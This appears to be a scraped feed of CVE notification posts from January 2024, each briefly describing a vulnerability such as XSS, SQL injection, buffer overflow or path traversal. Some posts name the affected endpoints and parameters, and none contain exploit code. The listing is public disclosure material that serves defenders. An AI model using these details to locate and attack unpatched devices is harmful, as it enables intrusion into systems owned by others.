🚨 CVE-2023-51734This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Remote endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 08:37:24 |
🚨 CVE-2023-51733This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Identity parameter under Local endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:43 |
🚨 CVE-2023-51732This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the IPsec Tunnel Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:41 |
🚨 CVE-2023-51731This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Hostname parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:40 |
🚨 CVE-2023-51729This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the DDNS Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:39 |
🚨 CVE-2023-51728This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the SMTP Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:34 |
🚨 CVE-2023-51726This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the SMTP Server Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:33 |
🚨 CVE-2023-51723This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Description parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:29 |
🚨 CVE-2023-51721This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Time Server 2 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:28 |
🚨 CVE-2023-51719This vulnerability exist in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user supplied input for the Traceroute parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system.Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.🎖@cveNotify |
|
| 2024-01-17 07:37:27 |
🚨 CVE-2022-23854AVEVA InTouch Access Anywhere versions 2020 R2 and older are vulnerable to a path traversal exploit that could allow an unauthenticated user with network access to read files on the system outside of the secure gateway web server.🎖@cveNotify |
|
| 2024-01-17 05:37:24 |
🚨 CVE-2024-0405The Burst Statistics – Privacy-Friendly Analytics for WordPress plugin, version 1.5.3, is vulnerable to Post-Authenticated SQL Injection via multiple JSON parameters in the /wp-json/burst/v1/data/compare endpoint. Affected parameters include 'browser', 'device', 'page_id', 'page_url', 'platform', and 'referrer'. This vulnerability arises due to insufficient escaping of user-supplied parameters and the lack of adequate preparation in SQL queries. As a result, authenticated attackers with editor access or higher can append additional SQL queries into existing ones, potentially leading to unauthorized access to sensitive information from the database.🎖@cveNotify |
|
| 2024-01-17 04:37:24 |
🚨 CVE-2023-32726The vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server.🎖@cveNotify |
|
| 2024-01-17 03:37:26 |
🚨 CVE-2023-52069kodbox v1.49.04 was discovered to contain a cross-site scripting (XSS) vulnerability via the URL parameter.🎖@cveNotify |
|
| 2024-01-17 03:37:25 |
🚨 CVE-2023-25295Cross Site Scripting (XSS) vulnerability in GRN Software Group eVEWA3 Community version 31 through 53, allows attackers to gain escalated privileges via crafted request to login panel.🎖@cveNotify |
|
| 2024-01-17 03:37:24 |
🚨 CVE-2023-32726The vulnerability is caused by improper check for check if RDLENGTH does not overflow the buffer in response from DNS server.🎖@cveNotify |
|
| 2024-01-17 02:37:24 |
🚨 CVE-2023-49515Insecure Permissiosn vulnerability in TP Link TC70 and C200 WIFI Camera v.3 firmware v.1.3.4 and fixed in v.1.3.11 allows a physically proximate attacker to obtain sensitive information via a connection to the UART pin components.🎖@cveNotify |
|
| 2024-01-17 02:07:25 |
🚨 CVE-2023-5455A Cross-site request forgery vulnerability exists in ipa/session/login_password in all supported versions of IPA. This flaw allows an attacker to trick the user into submitting a request that could perform actions as the user, resulting in a loss of confidentiality and system integrity. During community penetration testing it was found that for certain HTTP end-points FreeIPA does not ensure CSRF protection. Due to implementation details one cannot use this flaw for reflection of a cookie representing already logged-in user. An attacker would always have to go through a new authentication attempt.🎖@cveNotify |
|
| 2024-01-17 02:07:24 |
🚨 CVE-2018-15133In Laravel Framework through 5.5.40 and 5.6.x through 5.6.29, remote code execution might occur as a result of an unserialize call on a potentially untrusted X-XSRF-TOKEN value. This involves the decrypt method in Illuminate/Encryption/Encrypter.php and PendingBroadcast in gadgetchains/Laravel/RCE/3/chain.php in phpggc. The attacker must know the application key, which normally would never occur, but could happen if the attacker previously had privileged access or successfully accomplished a previous attack.🎖@cveNotify |
|
| 2024-01-17 01:37:32 |
🚨 CVE-2022-46025Totolink N200RE_V5 V9.3.5u.6255_B20211224 is vulnerable to Incorrect Access Control. The device allows remote attackers to obtain Wi-Fi system information, such as Wi-Fi SSID and Wi-Fi password, without logging into the management page.🎖@cveNotify |
|
| 2024-01-17 01:37:25 |
🚨 CVE-2024-0354A vulnerability, which was classified as critical, has been found in unknown-o download-station up to 1.1.8. This issue affects some unknown processing of the file index.php. The manipulation of the argument f leads to path traversal: '../filedir'. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250121 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-17 01:37:24 |
🚨 CVE-2024-0352A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250120.🎖@cveNotify |
|
| 2024-01-17 01:07:25 |
🚨 CVE-2024-20658Microsoft Virtual Hard Disk Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-01-17 01:07:24 |
🚨 CVE-2024-20655Microsoft Online Certificate Status Protocol (OCSP) Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-17 00:07:34 |
🚨 CVE-2023-42934An information disclosure issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sonoma 14, iOS 17 and iPadOS 17. An app with root privileges may be able to access private information.🎖@cveNotify |
|
| 2024-01-17 00:07:27 |
🚨 CVE-2023-42870A use-after-free issue was addressed with improved memory management. This issue is fixed in macOS Sonoma 14, iOS 17 and iPadOS 17. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2024-01-17 00:07:26 |
🚨 CVE-2023-40438An issue was addressed with improved handling of temporary files. This issue is fixed in macOS Sonoma 14, iOS 16.7 and iPadOS 16.7. An app may be able to access edited photos saved to a temporary directory.🎖@cveNotify |
|
| 2024-01-16 23:37:43 |
🚨 CVE-2021-24433The simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes "category_sims", "order_sims", "orderby_sims", "period_sims", and "tag_sims" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor🎖@cveNotify |
|
| 2024-01-16 23:37:37 |
🚨 CVE-2021-24432The Advanced AJAX Product Filters WordPress plugin does not sanitise the 'term_id' POST parameter before outputting it in the page, leading to reflected Cross-Site Scripting issue.🎖@cveNotify |
|
| 2024-01-16 23:37:36 |
🚨 CVE-2024-0575A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130. It has been classified as critical. This affects the function setTracerouteCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument command leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250791. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 23:37:35 |
🚨 CVE-2024-0574A vulnerability was found in Totolink LR1200GB 9.1.0u.6619_B20230130 and classified as critical. Affected by this issue is the function setParentalRules of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument sTime leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250790 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 23:37:31 |
🚨 CVE-2021-4432A vulnerability was found in PCMan FTP Server 2.0.7. It has been classified as problematic. This affects an unknown part of the component USER Command Handler. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250719.🎖@cveNotify |
|
| 2024-01-16 23:37:30 |
🚨 CVE-2024-0581An Uncontrolled Resource Consumption vulnerability has been found on Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan.🎖@cveNotify |
|
| 2024-01-16 23:37:26 |
🚨 CVE-2024-0572A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 23:37:25 |
🚨 CVE-2024-0570A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-16 22:37:32 |
🚨 CVE-2022-20966A vulnerability in the web-based management interface of Cisco Identity Services Engine could allow an authenticated, remote attacker to conduct cross-site scripting attacks against other users of the application web-based management interface. This vulnerability is due to improper validation of input to an application feature before storage within the web-based management interface. An attacker could exploit this vulnerability by creating entries within the application interface that contain malicious HTML or script code. A successful exploit could allow the attacker to store malicious HTML or script code within the application interface for use in further cross-site scripting attacks. Cisco has not yet released software updates that address this vulnerability.🎖@cveNotify |
|
| 2024-01-16 22:37:25 |
🚨 CVE-2022-20959A vulnerability in the External RESTful Services (ERS) API of Cisco Identity Services Engine (ISE) Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by persuading an authenticated administrator of the web-based management interface to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-01-16 22:37:24 |
🚨 CVE-2022-20822A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to read and delete files on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request that contains certain character sequences to an affected system. A successful exploit could allow the attacker to read or delete specific files on the device that their configured administrative level should not have access to. Cisco plans to release software updates that address this vulnerability.🎖@cveNotify |
|
| 2024-01-16 22:07:25 |
🚨 CVE-2023-48257The vulnerability allows a remote attacker to access sensitive data inside exported packages or obtain up to Remote Code Execution (RCE) with root privileges on the device. The vulnerability can be exploited directly by authenticated users, via crafted HTTP requests, or indirectly by unauthenticated users, by accessing already-exported backup packages, or crafting an import package and inducing an authenticated victim into sending the HTTP upload request.🎖@cveNotify |
|
| 2024-01-16 22:07:24 |
🚨 CVE-2023-48256The vulnerability allows a remote attacker to inject arbitrary HTTP response headers or manipulate HTTP response bodies inside a victim’s session via a crafted URL or HTTP request.🎖@cveNotify |
|
| 2024-01-16 21:37:32 |
🚨 CVE-2023-45169IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the pmsvcs kernel extension to cause a denial of service. IBM X-Force ID: 267967.🎖@cveNotify |
|
| 2024-01-16 21:37:25 |
🚨 CVE-2024-0357A vulnerability was found in coderd-repos Eva 1.0.0 and classified as critical. Affected by this issue is some unknown functionality of the file /system/traceLog/page of the component HTTP POST Request Handler. The manipulation of the argument property leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250124.🎖@cveNotify |
|
| 2024-01-16 21:37:24 |
🚨 CVE-2023-5625A regression was introduced in the Red Hat build of python-eventlet due to a change in the patch application strategy, resulting in a patch for CVE-2021-21419 not being applied for all builds of all products.🎖@cveNotify |
|
| 2024-01-16 21:07:31 |
🚨 CVE-2023-47997An issue discovered in BitmapAccess.cpp::FreeImage_AllocateBitmap in FreeImage 3.18.0 leads to an infinite loop and allows attackers to cause a denial of service.🎖@cveNotify |
|
| 2024-01-16 21:07:30 |
🚨 CVE-2023-47994An integer overflow vulnerability in LoadPixelDataRLE4 function in PluginBMP.cpp in Freeimage 3.18.0 allows attackers to obtain sensitive information, cause a denial of service and/or run arbitrary code.🎖@cveNotify |
|
| 2024-01-16 21:07:25 |
🚨 CVE-2024-21319Microsoft Identity Denial of service vulnerability🎖@cveNotify |
|
| 2024-01-16 21:07:24 |
🚨 CVE-2024-20654Microsoft ODBC Driver Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-01-16 20:37:32 |
🚨 CVE-2023-48260The vulnerability allows a remote unauthenticated attacker to read arbitrary content of the results database via a crafted HTTP request.🎖@cveNotify |
|
| 2024-01-16 20:37:25 |
🚨 CVE-2023-48243The vulnerability allows a remote attacker to upload arbitrary files in all paths of the system under the context of the application OS user (“root”) via a crafted HTTP request.By abusing this vulnerability, it is possible to obtain remote code execution (RCE) with root privileges on the device.🎖@cveNotify |
|
| 2024-01-16 20:37:24 |
🚨 CVE-2023-48242The vulnerability allows an authenticated remote attacker to download arbitrary files in all paths of the system under the context of the application OS user (“root”) via a crafted HTTP request.🎖@cveNotify |
|
| 2024-01-16 20:07:25 |
🚨 CVE-2023-5178A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe-oF/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation problem.🎖@cveNotify |
|
| 2024-01-16 20:07:24 |
🚨 CVE-2022-28734Out-of-bounds write when handling split HTTP headers; When handling split HTTP headers, GRUB2 HTTP code accidentally moves its internal data buffer point by one position. This can lead to a out-of-bound write further when parsing the HTTP request, writing a NULL byte past the buffer. It's conceivable that an attacker controlled set of packets can lead to corruption of the GRUB2's internal memory metadata.🎖@cveNotify |
|
| 2024-01-16 19:37:25 |
🚨 CVE-2019-11509In Pulse Secure Pulse Connect Secure (PCS) before 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 and Pulse Policy Secure (PPS) before 5.1R15.1, 5.2 before 5.2R12.1, 5.3 before 5.3R15.1, 5.4 before 5.4R7.1, and 9.0 before 9.0R3.2, an authenticated attacker (via the admin web interface) can exploit Incorrect Access Control to execute arbitrary code on the appliance.🎖@cveNotify |
|
| 2024-01-16 19:07:25 |
🚨 CVE-2024-0057NET, .NET Framework, and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-01-16 19:07:24 |
🚨 CVE-2024-0056Microsoft.Data.SqlClient and System.Data.SqlClient SQL Data Provider Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-01-16 18:07:25 |
🚨 CVE-2024-22164In Splunk Enterprise Security (ES) versions below 7.1.2, an attacker can use investigation attachments to perform a denial of service (DoS) to the Investigation. The attachment endpoint does not properly limit the size of the request which lets an attacker cause the Investigation to become inaccessible.🎖@cveNotify |
|
| 2024-01-16 18:07:24 |
🚨 CVE-2024-21737In SAP Application Interface Framework File Adapter - version 702, a high privilege user can use a function module to traverse through various layers and execute OS commands directly. By this, such user can control the behaviour of the application. This leads to considerable impact on confidentiality, integrity and availability.🎖@cveNotify |
|
| 2024-01-16 17:37:33 |
🚨 CVE-2023-35970Multiple heap-based buffer overflow vulnerabilities exist in the fstReaderIterBlocks2 chain_table parsing functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the chain_table of the `FST_BL_VCDATA_DYN_ALIAS2` section type.🎖@cveNotify |
|
| 2024-01-16 17:37:26 |
🚨 CVE-2023-35704Multiple stack-based buffer overflow vulnerabilities exist in the FST LEB128 varint functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the fstReaderVarint32WithSkip function.🎖@cveNotify |
|
| 2024-01-16 17:37:25 |
🚨 CVE-2023-35702Multiple stack-based buffer overflow vulnerabilities exist in the FST LEB128 varint functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger these vulnerabilities.This vulnerability concerns the fstReaderVarint32 function.🎖@cveNotify |
|
| 2024-01-16 17:37:24 |
🚨 CVE-2023-51767OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges.🎖@cveNotify |
|
| 2024-01-16 17:07:25 |
🚨 CVE-2023-5376An Improper Authentication vulnerability in Korenix JetNet TFTP allows abuse of this service. This issue affects JetNet devices older than firmware version 2024/01.🎖@cveNotify |
|
| 2024-01-16 17:07:24 |
🚨 CVE-2023-6830The Formidable Forms plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 6.7. This vulnerability allows unauthenticated users to inject arbitrary HTML code into form fields. When the form data is viewed by an administrator in the Entries View Page, the injected HTML code is rendered, potentially leading to admin area defacement or redirection to malicious websites.🎖@cveNotify |
|
| 2024-01-16 16:37:37 |
🚨 CVE-2023-38657An out-of-bounds write vulnerability exists in the LXT2 zlib block decompression functionality of GTKWave 3.3.115. A specially crafted .lxt2 file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:36 |
🚨 CVE-2023-37282An out-of-bounds write vulnerability exists in the VZT LZMA_Read dmem extraction functionality of GTKWave 3.3.115. A specially crafted .vzt file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:35 |
🚨 CVE-2023-36864An integer overflow vulnerability exists in the fstReaderIterBlocks2 temp_signal_value_buf allocation functionality of GTKWave 3.3.115. A specially crafted .fst file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:31 |
🚨 CVE-2023-35992An integer overflow vulnerability exists in the FST fstReaderIterBlocks2 vesc allocation functionality of GTKWave 3.3.115, when compiled as a 32-bit binary. A specially crafted .fst file can lead to memory corruption. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:30 |
🚨 CVE-2023-35057An integer overflow vulnerability exists in the LXT2 lxt2_rd_trace value elements allocation functionality of GTKWave 3.3.115. A specially crafted .lxt2 file can lead to memory corruption. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:26 |
🚨 CVE-2023-34436An out-of-bounds write vulnerability exists in the LXT2 num_time_table_entries functionality of GTKWave 3.3.115. A specially crafted .lxt2 file can lead to arbitrary code execution. A victim would need to open a malicious file to trigger this vulnerability.🎖@cveNotify |
|
| 2024-01-16 16:37:25 |
🚨 CVE-2022-4953The Elementor Website Builder WordPress plugin before 3.5.5 does not filter out user-controlled URLs from being loaded into the DOM. This could be used to inject rogue iframes that point to malicious URLs.🎖@cveNotify |
|
| 2024-01-16 16:07:24 |
🚨 CVE-2023-49722Network port 8899 open in WiFi firmware of BCC101/BCC102/BCC50 products, that allows an attacker to connect to the device via same WiFi network.🎖@cveNotify |
|
| 2024-01-16 15:37:25 |
🚨 CVE-2023-36660The OCB feature in libnettle in Nettle 3.9 before 3.9.1 allows memory corruption.🎖@cveNotify |
|
| 2024-01-16 15:37:24 |
🚨 CVE-2021-3580A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.🎖@cveNotify |
|
| 2024-01-16 15:07:25 |
🚨 CVE-2024-22368The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells.🎖@cveNotify |
|
| 2024-01-16 15:07:24 |
🚨 CVE-2023-49237An issue was discovered on TRENDnet TV-IP1314PI 5.5.3 200714 devices. Command injection can occur because the system function is used by davinci to unpack language packs without strict filtering of URL strings.🎖@cveNotify |
|
| 2024-01-16 14:37:30 |
🚨 CVE-2024-0572A vulnerability, which was classified as critical, was found in Totolink LR1200GB 9.1.0u.6619_B20230130. Affected is the function setOpModeCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument pppoeUser leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250788. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:37:29 |
🚨 CVE-2024-0571A vulnerability, which was classified as critical, has been found in Totolink LR1200GB 9.1.0u.6619_B20230130. This issue affects the function setSmsCfg of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument text leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250787. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:37:26 |
🚨 CVE-2024-0570A vulnerability classified as critical was found in Totolink N350RT 9.3.5u.6265. This vulnerability affects unknown code of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component. VDB-250786 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-16 14:37:25 |
🚨 CVE-2023-49581SAP GUI for Windows and SAP GUI for Java allow an unauthenticated attacker to access information which would otherwise be restricted and confidential. In addition, this vulnerability allows the unauthenticated attacker to write data to a database table. By doing so the attacker could increase response times of the AS ABAP, leading to mild impact on availability.🎖@cveNotify |
|
| 2024-01-16 14:37:24 |
🚨 CVE-2023-40611Apache Airflow, versions before 2.7.1, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc.Users should upgrade to version 2.7.1 or later which has removed the vulnerability.🎖@cveNotify |
|
| 2024-01-16 14:07:43 |
🚨 CVE-2024-0532A vulnerability was found in Tenda A15 15.13.07.13. It has been declared as critical. This vulnerability affects unknown code of the file /goform/WifiExtraSet of the component Web-based Management Interface. The manipulation of the argument wpapsk_crypto2_4g leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-250702 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:36 |
🚨 CVE-2024-0531A vulnerability was found in Tenda A15 15.13.07.13. It has been classified as critical. This affects an unknown part of the file /goform/setBlackRule of the component Web-based Management Interface. The manipulation of the argument deviceList leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250701 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:35 |
🚨 CVE-2024-0528A vulnerability, which was classified as critical, was found in CXBSoft Post-Office 1.0. Affected is an unknown function of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-250698 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:34 |
🚨 CVE-2024-0527A vulnerability, which was classified as critical, has been found in CXBSoft Url-shorting up to 1.3.1. This issue affects some unknown processing of the file /admin/pages/update_go.php of the component HTTP POST Request Handler. The manipulation of the argument version leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-250697 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:31 |
🚨 CVE-2024-0525A vulnerability classified as critical has been found in CXBSoft Url-shorting up to 1.3.1. This affects an unknown part of the file /pages/long_s_short.php of the component HTTP POST Request Handler. The manipulation of the argument longurl leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250695. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:30 |
🚨 CVE-2024-0523A vulnerability was found in CmsEasy up to 7.7.7. It has been declared as critical. Affected by this vulnerability is the function getslide_child_action in the library lib/admin/language_admin.php. The manipulation of the argument sid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250693 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-16 14:07:29 |
🚨 CVE-2024-0522A vulnerability was found in Allegro RomPager 4.01. It has been classified as problematic. Affected is an unknown function of the file usertable.htm?action=delete of the component HTTP POST Request Handler. The manipulation of the argument username leads to cross-site request forgery. It is possible to launch the attack remotely. Upgrading to version 4.30 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-250692. NOTE: The vendor explains that this is a very old issue that got fixed 20 years ago but without a public disclosure.🎖@cveNotify |
|
| 2024-01-16 13:37:25 |
🚨 CVE-2024-0569A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-16 13:37:24 |
🚨 CVE-2021-22918Node.js before 16.4.1, 14.17.2, 12.22.2 is vulnerable to an out-of-bounds read when uv__idna_toascii() is used to convert strings to ASCII. The pointer p is read and increased without checking whether it is beyond pe, with the latter holding a pointer to the end of the buffer. This can lead to information disclosures or crashes. This function can be triggered via uv_getaddrinfo().🎖@cveNotify |
|
| 2024-01-16 12:37:24 |
🚨 CVE-2023-6004A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter.🎖@cveNotify |
|
| 2024-01-16 11:37:25 |
🚨 CVE-2024-0556A Weak Cryptography for Passwords vulnerability has been detected on WIC200 affecting version 1.1. This vulnerability allows a remote user to intercept the traffic and retrieve the credentials from another user and decode it in base64 allowing the attacker to see the credentials in plain text.🎖@cveNotify |
|
| 2024-01-16 11:37:24 |
🚨 CVE-2024-0554A Cross-site scripting (XSS) vulnerability has been found on WIC1200, affecting version 1.1. An authenticated user could store a malicious javascript payload in the device model parameter via '/setup/diags_ir_learn.asp', allowing the attacker to retrieve the session details of another user.🎖@cveNotify |
|
| 2024-01-16 10:37:32 |
🚨 CVE-2023-52103Buffer overflow vulnerability in the FLP module. Successful exploitation of this vulnerability may cause out-of-bounds read.🎖@cveNotify |
|
| 2024-01-16 10:37:25 |
🚨 CVE-2023-52100The Celia Keyboard module has a vulnerability in access control. Successful exploitation of this vulnerability may affect availability.🎖@cveNotify |
|
| 2024-01-16 10:37:24 |
🚨 CVE-2023-34063Aria Automation contains a Missing Access Control vulnerability.An authenticated malicious actor may exploit this vulnerability leading to unauthorized access to remote organizations and workflows.🎖@cveNotify |
|
| 2024-01-16 09:37:30 |
